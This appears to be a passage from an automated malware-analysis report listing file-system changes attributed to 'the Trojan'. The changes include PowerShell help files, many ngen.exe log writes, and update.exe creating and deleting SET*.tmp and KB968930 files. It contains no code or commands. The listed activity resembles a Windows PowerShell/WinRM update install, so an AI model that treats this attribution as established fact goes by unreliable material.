C:\ea4acb66495575d6b9f323\about_foreach.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (0 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (0 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (0 bytes)
C:\ea4acb66495575d6b9f323 (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (0 bytes)

The process ngen.exe:3596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:3168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)

The process ngen.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (782 bytes)

The process ngen.exe:2988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)

The process ngen.exe:3172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)

The process ngen.exe:1960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)

The process ngen.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)

The process ngen.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1112 bytes)

The process ngen.exe:916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)

The process ngen.exe:2952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)

The process ngen.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:1724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:2164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)

The process ngen.exe:648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)

The process update.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
%System%\SET12.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
%System%\SET1B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
%WinDir%\inf\SET1D.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
%System%\SET1A.tmp (789 bytes)
%WinDir%\Help\SETCA.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
%WinDir%\SECD5.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
%System%\winrm\0409\SET22.tmp (601 bytes)
%System%\SET36.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
%System%\SET25.tmp (2 bytes)
%System%\SET13.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
%System%\SET14.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
%WinDir%\inf\SET1E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
%System%\SET2A.tmp (1281 bytes)
%System%\SETC4.tmp (42 bytes)
%System%\SET19.tmp (25 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\SET2D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
%System%\SET33.tmp (25 bytes)
%WinDir%\msmqinst.log (5398 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
%System%\SETB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
%System%\SET2B.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
%System%\SET2E.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
%System%\SETE.tmp (673 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
%System%\wbem\SET23.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\SET17.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\SET34.tmp (789 bytes)
%System%\SET18.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
%System%\SET27.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
%System%\SET11.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
%System%\SET35.tmp (14 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\SET10.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
%System%\SET26.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
%System%\config\system (3251 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
%System%\SET32.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\wbem\SET9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
%System%\SET16.tmp (12 bytes)
%System%\winrm\0409\SET3C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (49682 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
%System%\SET28.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
%System%\SET31.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
%System%\SET29.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
%System%\SET2C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
%WinDir%\KB968930.log (245066 bytes)
%System%\SET15.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\SET24.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
%System%\SET1C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
%System%\SETD.tmp (1281 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\SETC.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
%WinDir%\inf\SET37.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
%WinDir%\inf\SET38.tmp (12 bytes)
%System%\SET2F.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
%System%\SET30.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)

The Trojan deletes the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%WinDir%\inf\SET1D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\SET1A.tmp (0 bytes)
%WinDir%\Help\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (0 bytes)
%WinDir%\SECD5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\winrm\0409\SET22.tmp (0 bytes)
%System%\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\SETC4.tmp (0 bytes)
%System%\SET19.tmp (0 bytes)
%System%\SET1B.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\wbem\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\SET34.tmp (0 bytes)
%System%\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (0 bytes)
%WinDir%\Temp\UPD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET35.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\wbem\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
